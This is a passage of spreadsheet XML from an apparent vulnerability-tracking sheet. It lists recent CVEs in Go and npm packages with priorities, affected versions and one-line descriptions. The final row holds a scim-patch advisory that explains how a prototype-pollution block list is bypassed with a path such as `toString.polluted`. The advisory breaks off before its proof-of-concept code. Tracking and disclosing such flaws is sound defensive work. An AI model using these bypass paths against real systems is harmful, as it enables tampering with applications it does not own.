      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr"/>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>Grafana Loki datasource plugin's callResource handler contains a path traversal vulnerability. in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42129</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5139</t>
        </is>
      </c>
      <c r="D323" s="5" t="inlineStr"/>
      <c r="E323" s="5" t="inlineStr"/>
      <c r="F323" s="5" t="inlineStr"/>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M323" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr"/>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't enforce administrator authorization on the {{setDefaultInstance}} call within the {{/gitlab connect}} command handler in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5139</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58197</t>
        </is>
      </c>
      <c r="D324" s="5" t="inlineStr"/>
      <c r="E324" s="5" t="inlineStr"/>
      <c r="F324" s="5" t="inlineStr"/>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/stacklok/toolhive</t>
        </is>
      </c>
      <c r="M324" s="5" t="inlineStr">
        <is>
          <t>0.30.1</t>
        </is>
      </c>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr"/>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>ToolHive: containerized MCP servers can reach host services via host.docker.internal, enabling lateral movement in github.com/stacklok/toolhive</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58197</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58463</t>
        </is>
      </c>
      <c r="D325" s="5" t="inlineStr"/>
      <c r="E325" s="5" t="inlineStr"/>
      <c r="F325" s="5" t="inlineStr"/>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr"/>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr"/>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58463</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58464</t>
        </is>
      </c>
      <c r="D326" s="5" t="inlineStr"/>
      <c r="E326" s="5" t="inlineStr"/>
      <c r="F326" s="5" t="inlineStr"/>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr"/>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58464</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6062</t>
        </is>
      </c>
      <c r="D327" s="5" t="inlineStr"/>
      <c r="E327" s="5" t="inlineStr"/>
      <c r="F327" s="5" t="inlineStr"/>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M327" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr"/>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't validate channel ownership of an existing subscription before applying edits in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6062</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61554</t>
        </is>
      </c>
      <c r="D328" s="5" t="inlineStr"/>
      <c r="E328" s="5" t="inlineStr"/>
      <c r="F328" s="5" t="inlineStr"/>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/jm33-m0/emp3r0r/core</t>
        </is>
      </c>
      <c r="M328" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260531142011-aed3d81641ab</t>
        </is>
      </c>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr"/>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>emp3r0r has an unauthenticated HTTP Polling DoS in github.com/jm33-m0/emp3r0r/core</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61554</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61628</t>
        </is>
      </c>
      <c r="D329" s="5" t="inlineStr"/>
      <c r="E329" s="5" t="inlineStr"/>
      <c r="F329" s="5" t="inlineStr"/>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr"/>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has Unauthenticated Admin Account Creation via Onboarding Race Condition in github.com/lucasdillmann/nginx-ignition.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github.com/lucasdillmann/nginx-ignition before v0.0.0-20260621194639-0586b4e55ab.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61628</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61629</t>
        </is>
      </c>
      <c r="D330" s="5" t="inlineStr"/>
      <c r="E330" s="5" t="inlineStr"/>
      <c r="F330" s="5" t="inlineStr"/>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M330" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260526022344-0c988fc1277c</t>
        </is>
      </c>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr"/>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has ParseAcceptLanguage `_` separator bypass that enables ~75x CPU amplification via Accept-Language header in i18nMiddleware in github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61629</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61630</t>
        </is>
      </c>
      <c r="D331" s="5" t="inlineStr"/>
      <c r="E331" s="5" t="inlineStr"/>
      <c r="F331" s="5" t="inlineStr"/>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M331" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260328015550-8d35e1eb5dd6</t>
        </is>
      </c>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr"/>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has TOTP Reuse During Validity Window in github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61630</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61672</t>
        </is>
      </c>
      <c r="D332" s="5" t="inlineStr"/>
      <c r="E332" s="5" t="inlineStr"/>
      <c r="F332" s="5" t="inlineStr"/>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M332" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr"/>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>Capsule: Tenant owner bypasses Capsule's forbidden namespace/service/node label and annotation enforcement in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61672</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61682</t>
        </is>
      </c>
      <c r="D333" s="5" t="inlineStr"/>
      <c r="E333" s="5" t="inlineStr"/>
      <c r="F333" s="5" t="inlineStr"/>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/kcp-dev/kcp</t>
        </is>
      </c>
      <c r="M333" s="5" t="inlineStr">
        <is>
          <t>0.31.4, 0.32.2</t>
        </is>
      </c>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr"/>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>kcp front-proxy does not strip inbound X-Remote-* identity headers, allowing any authenticated client to inject groups/warrants and impersonate system:masters in any workspace in github.com/kcp-dev/kcp</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61682</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61687</t>
        </is>
      </c>
      <c r="D334" s="5" t="inlineStr"/>
      <c r="E334" s="5" t="inlineStr"/>
      <c r="F334" s="5" t="inlineStr"/>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/hatchet-dev/hatchet</t>
        </is>
      </c>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr"/>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>Hatchet - Unauthenticated OAuth state CSRF / login-CSRF via empty-state collision in ValidateOAuthState in hatchet in github.com/hatchet-dev/hatchet.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github.com/hatchet-dev/hatchet before v0.91.1.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61687</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61709</t>
        </is>
      </c>
      <c r="D335" s="5" t="inlineStr"/>
      <c r="E335" s="5" t="inlineStr"/>
      <c r="F335" s="5" t="inlineStr"/>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/openfga/openfga</t>
        </is>
      </c>
      <c r="M335" s="5" t="inlineStr">
        <is>
          <t>1.18.1</t>
        </is>
      </c>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr"/>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>OpenFGA: ListUsers returns a deliberately-excluded user when a `but not` exclusion under a type-bound wildcard is intersected (`and`) with another relation that also grants that user in github.com/openfga/openfga</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61709</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61794</t>
        </is>
      </c>
      <c r="D336" s="5" t="inlineStr"/>
      <c r="E336" s="5" t="inlineStr"/>
      <c r="F336" s="5" t="inlineStr"/>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M336" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr"/>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Capsule: Malformed ForbiddenAnnotations.Regex can bypass Tenant validation and trigger namespace admission panic in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61794</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61795</t>
        </is>
      </c>
      <c r="D337" s="5" t="inlineStr"/>
      <c r="E337" s="5" t="inlineStr"/>
      <c r="F337" s="5" t="inlineStr"/>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M337" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr"/>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>Capsule: hostnameRegexHandler.OnUpdate validates stale (old) Tenant regex, allowing invalid AllowedHostnames regex to bypass webhook validation in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61795</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61833</t>
        </is>
      </c>
      <c r="D338" s="5" t="inlineStr"/>
      <c r="E338" s="5" t="inlineStr"/>
      <c r="F338" s="5" t="inlineStr"/>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr">
        <is>
          <t>Go:zotregistry.dev/zot, Go:zotregistry.dev/zot/v2</t>
        </is>
      </c>
      <c r="M338" s="5" t="inlineStr">
        <is>
          <t>2.1.18</t>
        </is>
      </c>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr"/>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>zot: Bearer authentication maps DELETE to push scope, allowing unauthorized deletion in zotregistry.dev/zot</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61833</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61834</t>
        </is>
      </c>
      <c r="D339" s="5" t="inlineStr"/>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr">
        <is>
          <t>npm:scim-patch</t>
        </is>
      </c>
      <c r="M339" s="5" t="inlineStr">
        <is>
          <t>0.9.2</t>
        </is>
      </c>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr"/>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>## Summary
Incomplete Prototype Pollution Fix Allows Mutation of Inherited Built-in Method Objects
`scim-patch` blocks direct dangerous path segments such as `__proto__`, `constructor`, and `prototype`, but still traverses inherited properties when applying SCIM patch paths.
An attacker who controls a SCIM PATCH operation can use paths such as `toString.polluted` to mutate shared built-in function objects, for example `Object.prototype.toString`.
## Impact
A malicious patch can add attacker-controlled properties to inherited built-in method objects. The impact is narrower than direct `Object.prototype` pollution, but the mutation is process-global and may affect application logic that reads properties from inherited methods.
## Details
Affected code paths:
- `navigate()` reads inherited properties via `schema[subPath]`
- `assign()` uses `key in obj`, which treats inherited properties as existing
Because inherited keys are followed, safe-looking path segments such as `toString` can resolve to shared built-in objects.
## PoC
```js
